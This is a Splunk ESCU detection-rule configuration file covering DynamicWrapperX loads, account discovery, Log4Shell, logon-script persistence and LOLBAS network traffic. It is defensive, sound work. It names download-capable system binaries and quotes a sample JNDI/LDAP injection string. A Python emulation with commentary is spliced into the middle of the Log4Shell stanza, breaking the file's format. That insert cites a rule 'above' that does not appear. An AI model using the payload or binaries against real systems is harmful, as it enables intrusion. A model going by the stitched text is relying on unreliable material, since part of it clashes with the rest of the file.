action.escu.eli5 = DynamicWrapperX is an ActiveX component that lets a script call Windows API functions, but it requires dynwrapx.dll to be installed and registered. Registering or loading dynwrapx.dll on a host is therefore highly suspicious. When it is used maliciously, the best way to triage is usually to review parallel processes and pivot on the process_guid. Review the registry for any suspicious modifications meant to load dynwrapx.dll, and identify any suspicious module loads of dynwrapx.dll. This detection returns the processes, typically wscript.exe or cscript.exe running a VBScript, that loaded dynwrapx.dll.
action.escu.how_to_implement = The search runs directly against Sysmon image load events (EventCode 7) through the `sysmon` macro rather than the Endpoint data model, so you need to be ingesting Sysmon data, including module loads, from your endpoints. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product.
action.escu.known_false_positives = False positives should be limited; however, it is possible to filter by process_name for specific processes (for example, wscript.exe). Filter as needed. This may need modification based on EDR telemetry and how it brings in registry data, for example removal of (Default).
action.escu.creation_date = 2021-11-18
action.escu.modification_date = 2021-11-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - Loading Of Dynwrapx Module - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Remcos", "AsyncRAT"]
action.risk = 1
action.risk.param._risk_message = dynwrapx.dll loaded by process $process_name$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Loading Of Dynwrapx Module - Rule
action.correlationsearch.annotations = {"analytic_story": ["Remcos", "AsyncRAT"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055", "T1055.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = DynamicWrapperX is an ActiveX component that lets a script call Windows API functions, but it requires dynwrapx.dll to be installed and registered. Registering or loading dynwrapx.dll on a host is therefore highly suspicious. When it is used maliciously, the best way to triage is usually to review parallel processes and pivot on the process_guid. Review the registry for any suspicious modifications meant to load dynwrapx.dll, and identify any suspicious module loads of dynwrapx.dll. This detection returns the processes, typically wscript.exe or cscript.exe running a VBScript, that loaded dynwrapx.dll.
action.notable.param.rule_title = Loading Of Dynwrapx Module
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=7 (ImageLoaded = "*\\dynwrapx.dll" OR OriginalFileName = "dynwrapx.dll" OR Product = "DynamicWrapperX") | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded OriginalFileName Product process_name dest EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `loading_of_dynwrapx_module_filter`

[ESCU - Local Account Discovery with Net - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments used to query local users. Both arguments, `user` and `users`, return a list of all local users. Red teams and adversaries alike use net.exe to enumerate users for situational awareness and Active Directory discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments used to query local users. Both arguments, `user` and `users`, return a list of all local users. Red teams and adversaries alike use net.exe to enumerate users for situational awareness and Active Directory discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-09-16
action.escu.modification_date = 2021-09-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Local Account Discovery with Net - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery", "Sandworm Tools"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Local Account Discovery with Net - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Sandworm Tools"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` (Processes.process=*user OR Processes.process=*users) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `local_account_discovery_with_net_filter`

[ESCU - Local Account Discovery With Wmic - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `wmic.exe` with command-line arguments used to query local users. The `useraccount` argument uses WMI to return a list of all local users. Red teams and adversaries alike use wmic.exe to enumerate users for situational awareness and Active Directory discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments used to query local users. The `useraccount` argument uses WMI to return a list of all local users. Red teams and adversaries alike use wmic.exe to enumerate users for situational awareness and Active Directory discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-09-16
action.escu.modification_date = 2021-09-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Local Account Discovery With Wmic - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Local Account Discovery With Wmic - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` (Processes.process=*useraccount*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `local_account_discovery_with_wmic_filter`

[ESCU - Log4Shell CVE-2021-44228 Exploitation - Rule]
action.escu = 0
action.escu.enabled = 1
description = This correlation finds exploitation of Log4Shell CVE-2021-44228 against systems using detections from the Splunk Security Content analytic story. It does this by counting the distinct MITRE ATT&CK tactics of the Log4Shell detections that fired; if detections from 2 or more distinct tactics have fired against a system, we assume a high probability of exploitation. The analytic story breaks Log4Shell exploitation into 3 major phases: (1) initial payload delivery, e.g. `${jndi:ldap://PAYLOAD_INJECTED}`; (2) callback to a malicious LDAP server, e.g. Exploit.class; (3) post-exploitation activity or lateral movement using PowerShell or similar (T1562.001). Each phase falls under a different MITRE ATT&CK tactic (Initial Access, Execution, Command And Control), so seeing 2 or more phases in triggered detections is how this correlation search finds exploitation. If this correlation search produces a notable, the best way to triage it is to investigate the affected systems for Log4Shell exploitation using Splunk SOAR playbooks.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control", "Delivery", "Installation"], "mitre_attack": ["T1105", "T1190", "T1059", "T1133"], "nist": ["DE.AE"]}
action.escu.data_models = ["Risk"]
action.escu.eli5 = This correlation finds exploitation of Log4Shell CVE-2021-44228 against systems using detections from the Splunk Security Content analytic story. It does this by counting the distinct MITRE ATT&CK tactics of the Log4Shell detections that fired; if detections from 2 or more distinct tactics have fired against a system, we assume a high probability of exploitation. The analytic story breaks Log4Shell exploitation into 3 major phases: (1) initial payload delivery, e.g. `${jndi:ldap://PAYLOAD_INJECTED}`; (2) callback to a malicious LDAP server, e.g. Exploit.class; (3) post-exploitation activity or lateral movement using PowerShell or similar (T1562.001). Each phase falls under a different MITRE ATT&CK tactic (Initial Access, Execution, Command And Control), so seeing 2 or more phases in triggered detections is how this correlation search finds exploitation. If this correlation search produces a notable, the best way to triage it is to investigate the affected systems for Log4Shell exploitation using Splunk SOAR playbooks.
action.escu.how_to_implement = To implement this correlation search, enable all detections in the Log4Shell analytic story and confirm they are generating risk events. A simple search `index=risk analyticstories="Log4Shell CVE-2021-44228"` should return events.
action.escu.known_false_positives = There are no known false positives for this search, but it could produce them, as multiple detections can trigger without successful exploitation. Note that the search thresholds on source_count, the number of distinct detections per risk object and MITRE tactic group (2 in this search); raise it to reduce noise.
action.escu.creation_date = 2022-09-09
action.escu.modification_date = 2022-09-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Log4Shell CVE-2021-44228 Exploitation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Log4Shell CVE-2021-44228", "CISA AA22-320A"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - RIR - Log4Shell CVE-2021-44228 Exploitation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Log4Shell CVE-2021-44228", "CISA AA22-320A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Command and Control", "Delivery", "Installation"], "mitre_attack": ["T1105", "T1190", "T1059", "T1133"], "nist": ["DE.AE"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This correlation finds exploitation of Log4Shell CVE-2021-44228 against systems using detections from the Splunk Security Content analytic story. It does this by counting the distinct MITRE ATT&CK tactics of the Log4Shell detections that fired; if detections from 2 or more distinct tactics have fired against a system, we assume a high probability of exploitation. The analytic story breaks Log4Shell exploitation into 3 major phases: (1) initial payload delivery, e.g. `${jndi:ldap://PAYLOAD_INJECTED}`; (2) callback to a malicious LDAP server, e.g. Exploit.class; (3) post-exploitation activity or lateral movement using PowerShell or similar (T1562.001). Each phase falls under a different MITRE ATT&CK tactic (Initial Access, Execution, Command And Control), so seeing 2 or more phases in triggered detections is how this correlation search finds exploitation. If this correlation search produces a notable, the best way to triage it is to investigate the affected systems for Log4Shell exploitation using Splunk SOAR playbooks.
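The following is an added example, not part of the Splunk content: it emulates in Python the risk-based correlation that both the Living Off The Land rule above and the Log4Shell rule here run over the Risk data model, grouping by risk object and MITRE tactic and thresholding on the number of distinct detections (source_count), with the thresholds 5 and 2 taken from the two searches. The risk events, hosts and detection names are constructed and hypothetical.

```python
"""Added example (not Splunk's code): emulate the risk-based correlation used
by the Living Off The Land and Log4Shell rules over constructed risk events.
Field names follow the Risk.All_Risk data model used by the searches."""

# Story names and source_count thresholds copied from the two searches.
LOTL_STORY, LOTL_MIN_SOURCES = "Living Off The Land", 5
LOG4SHELL_STORY, LOG4SHELL_MIN_SOURCES = "Log4Shell CVE-2021-44228", 2


def correlate_risk(risk_events, analytic_story, min_sources):
    """Keep risk events of one story whose risk object is a system, group by
    (risk_object, mitre_tactic) exactly as the searches do, aggregate the
    fields they compute, and return the groups whose number of distinct
    detections (source_count) reaches `min_sources`."""
    groups = {}
    for ev in risk_events:
        if analytic_story not in ev["analyticstories"] or ev["risk_object_type"] != "system":
            continue
        key = (ev["risk_object"], ev["mitre_tactic"])
        g = groups.setdefault(key, {
            "firstTime": ev["_time"], "lastTime": ev["_time"],
            "risk_score": 0, "risk_event_count": 0,
            "sources": set(), "tactic_ids": set(), "technique_ids": set()})
        g["firstTime"] = min(g["firstTime"], ev["_time"])
        g["lastTime"] = max(g["lastTime"], ev["_time"])
        g["risk_score"] += ev["calculated_risk_score"]
        g["risk_event_count"] += 1
        g["sources"].add(ev["source"])
        g["tactic_ids"].add(ev["mitre_tactic_id"])
        g["technique_ids"].add(ev["mitre_technique_id"])
    return {key: g for key, g in groups.items() if len(g["sources"]) >= min_sources}


def _risk_event(t, host, story, source, tactic, tactic_id, technique_id, score):
    return {"_time": t, "risk_object": host, "risk_object_type": "system",
            "analyticstories": [story], "source": source, "mitre_tactic": tactic,
            "mitre_tactic_id": tactic_id, "mitre_technique_id": technique_id,
            "calculated_risk_score": score}


# Constructed risk index content: hypothetical hosts and detection names.
T0 = 1_700_000_000
SAMPLE_RISK_EVENTS = [
    # app-07: two distinct Log4Shell detections in the same tactic -> one group, source_count 2.
    _risk_event(T0 + 10, "app-07", LOG4SHELL_STORY, "ESCU - Hypothetical Log4Shell Detection A - Rule",
                "execution", "TA0002", "T1059", 50),
    _risk_event(T0 + 40, "app-07", LOG4SHELL_STORY, "ESCU - Hypothetical Log4Shell Detection B - Rule",
                "execution", "TA0002", "T1059.004", 40),
    # app-08: two detections under different tactics -> two groups with source_count 1 each.
    _risk_event(T0 + 20, "app-08", LOG4SHELL_STORY, "ESCU - Hypothetical Log4Shell Detection C - Rule",
                "initial-access", "TA0001", "T1190", 50),
    _risk_event(T0 + 30, "app-08", LOG4SHELL_STORY, "ESCU - Hypothetical Log4Shell Detection A - Rule",
                "execution", "TA0002", "T1059", 40),
    # ws-12: five distinct Living Off The Land detections -> reaches the threshold of 5.
    *[_risk_event(T0 + i, "ws-12", LOTL_STORY, f"ESCU - Hypothetical LOTL Detection {i} - Rule",
                  "execution", "TA0002", "T1059", 20) for i in range(5)],
    # ws-13: one detection firing six times is still a single source.
    *[_risk_event(T0 + i, "ws-13", LOTL_STORY, "ESCU - Hypothetical LOTL Detection 0 - Rule",
                  "execution", "TA0002", "T1059", 20) for i in range(6)],
    # A user risk object is dropped by the risk_object_type="system" filter.
    {**_risk_event(T0, "alice", LOG4SHELL_STORY, "ESCU - Hypothetical Log4Shell Detection A - Rule",
                   "execution", "TA0002", "T1059", 50), "risk_object_type": "user"},
]
```

Because both searches group by `mitre_tactic`, app-08's two detections under different tactics land in separate groups that never reach source_count 2, while app-07's two detections under the same tactic do. Confirm against your own risk index that this grouping gives the behavior you expect before relying on the "two or more tactics" reading of the description.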
action.notable.param.rule_title = RBA: Log4Shell CVE-2021-44228 Exploitation
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Log4Shell CVE-2021-44228" All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 2 | `log4shell_cve_2021_44228_exploitation_filter`

[ESCU - Logon Script Event Trigger Execution - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a suspicious modification of a registry entry used to persist and gain privilege escalation upon boot of a compromised host. This technique was seen in several APT campaigns and malware families, which modify the UserInitMprLogonScript registry entry to point to a malicious payload that is executed upon boot of the machine.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1037", "T1037.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects a suspicious modification of a registry entry used to persist and gain privilege escalation upon boot of a compromised host. This technique was seen in several APT campaigns and malware families, which modify the UserInitMprLogonScript registry entry to point to a malicious payload that is executed upon boot of the machine.
action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Logon Script Event Trigger Execution - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = modified/added/deleted registry entry $Registry.registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Logon Script Event Trigger Execution - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1037", "T1037.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a suspicious modification of a registry entry used to persist and gain privilege escalation upon boot of a compromised host. This technique was seen in several APT campaigns and malware families, which modify the UserInitMprLogonScript registry entry to point to a malicious payload that is executed upon boot of the machine.
action.notable.param.rule_title = Logon Script Event Trigger Execution
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path IN ("*\\Environment\\UserInitMprLogonScript") by Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `logon_script_event_trigger_execution_filter`

[ESCU - LOLBAS With Network Traffic - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies LOLBAS with network traffic. When adversaries abuse LOLBAS they are often used to download malicious code or executables. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like downloading malicious code. Looking for these processes can help defenders identify lateral movement, command-and-control, or exfiltration activities.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Command and Control", "Actions on Objectives", "Exploitation"], "mitre_attack": ["T1105", "T1567", "T1218"], "nist": ["DE.CM"]}
action.escu.data_models = ["Network_Traffic"]
action.escu.eli5 = The following analytic identifies LOLBAS with network traffic. When adversaries abuse LOLBAS they are often used to download malicious code or executables. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like downloading malicious code. Looking for these processes can help defenders identify lateral movement, command-and-control, or exfiltration activities.
action.escu.how_to_implement = To successfully implement this detection you must ingest events into the Network traffic data model that contain the source, destination, and communicating process in the app field. Relevant processes must also be ingested in the Endpoint data model with a matching process_id field. Sysmon EID 1 and EID 3 are good examples of this data type.
action.escu.known_false_positives = Legitimate usage of internal automation or scripting, especially powershell.exe internal to internal or logon scripts. It may be necessary to omit internal IP ranges if extremely noisy, i.e. NOT dest_ip IN ("10.0.0.0/8","172.16.0.0/12","192.168.0.0/16","170.98.0.0/16","0:0:0:0:0:0:0:1")
action.escu.creation_date = 2021-12-09
action.escu.modification_date = 2021-12-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - LOLBAS With Network Traffic - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = The LOLBAS $process_name$ on device $src$ was seen communicating with $dest$.
action.risk.param._risk = [{"risk_object_field": "src", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - LOLBAS With Network Traffic - Rule
action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control", "Actions on Objectives", "Exploitation"], "mitre_attack": ["T1105", "T1567", "T1218"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies LOLBAS with network traffic. When adversaries abuse LOLBAS they are often used to download malicious code or executables. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like downloading malicious code. Looking for these processes can help defenders identify lateral movement, command-and-control, or exfiltration activities.
action.notable.param.rule_title = LOLBAS With Network Traffic
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic where (All_Traffic.app IN ("*Regsvcs.exe", "*\\Ftp.exe", "*OfflineScannerShell.exe", "*Rasautou.exe", "*Schtasks.exe", "*Xwizard.exe", "*Pnputil.exe", "*Atbroker.exe", "*Pcwrun.exe", "*Ttdinject.exe", "*Mshta.exe", "*Bitsadmin.exe", "*Certoc.exe", "*Ieexec.exe", "*Microsoft.Workflow.Compiler.exe", "*Runscripthelper.exe", "*Forfiles.exe", "*Msbuild.exe", "*Register-cimprovider.exe", "*Tttracer.exe", "*Ie4uinit.exe", "*Bash.exe", "*Hh.exe", "*SettingSyncHost.exe", "*Cmstp.exe", "*Stordiag.exe", "*Scriptrunner.exe", "*Odbcconf.exe", "*Extexport.exe", "*Msdt.exe", "*WorkFolders.exe", "*Diskshadow.exe", "*Mavinject.exe", "*Regasm.exe", "*Gpscript.exe", "*Regsvr32.exe", "*Msiexec.exe", "*Wuauclt.exe", "*Presentationhost.exe", "*Wmic.exe", "*Runonce.exe", "*Syncappvpublishingserver.exe", "*Verclsid.exe", "*Infdefaultinstall.exe", "*Installutil.exe", "*Netsh.exe", "*Wab.exe", "*Dnscmd.exe", "*\\At.exe", "*Pcalua.exe", "*Msconfig.exe", "*makecab.exe", "*cscript.exe", "*notepad.exe", "*\\cmd.exe", "*certutil.exe", "*\\powershell.exe", "*powershell_ise.exe")) by All_Traffic.app,All_Traffic.src,All_Traffic.src_ip,All_Traffic.user,All_Traffic.dest,All_Traffic.dest_ip | `drop_dm_object_name(All_Traffic)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rex field=app ".*\\\(?.*)$" | rename app as process | `lolbas_with_network_traffic_filter`

[ESCU - MacOS - Re-opened Applications - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for processes referencing the plist files that determine which applications are re-opened when a user reboots their machine.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for processes referencing the plist files that determine which applications are re-opened when a user reboots their machine.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = At this stage, there are no known false positives. During testing, no process events referring to the com.apple.loginwindow.plist files were observed during normal operation of re-opening applications on reboot. Therefore, it can be assumed that any occurrences of this in the process events would be worth investigating. In the event that the legitimate modification by the system of these files is in fact logged to the process log, then the process_name of that process can be added to an allow list.
action.escu.creation_date = 2020-02-07
action.escu.modification_date = 2020-02-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - MacOS - Re-opened Applications - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["ColdRoot MacOS RAT"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - MacOS - Re-opened Applications - Rule
action.correlationsearch.annotations = {"analytic_story": ["ColdRoot MacOS RAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for processes referencing the plist files that determine which applications are re-opened when a user reboots their machine.
action.notable.param.rule_title = MacOS - Re-opened Applications
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*com.apple.loginwindow*" by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `macos___re_opened_applications_filter`

[ESCU - MacOS LOLbin - Rule]
action.escu = 0
action.escu.enabled = 1
description = Detect multiple executions of Living off the Land (LOLbin) binaries in a short period of time.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004", "T1059"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = Detect multiple executions of Living off the Land (LOLbin) binaries in a short period of time.
action.escu.how_to_implement = This detection uses osquery and endpoint security on MacOS. Follow the link in references, which describes how to set up process auditing in MacOS with endpoint security and osquery.
action.escu.known_false_positives = None identified.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - MacOS LOLbin - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = Multiple LOLbins are executed on host $dest$ by user $user$
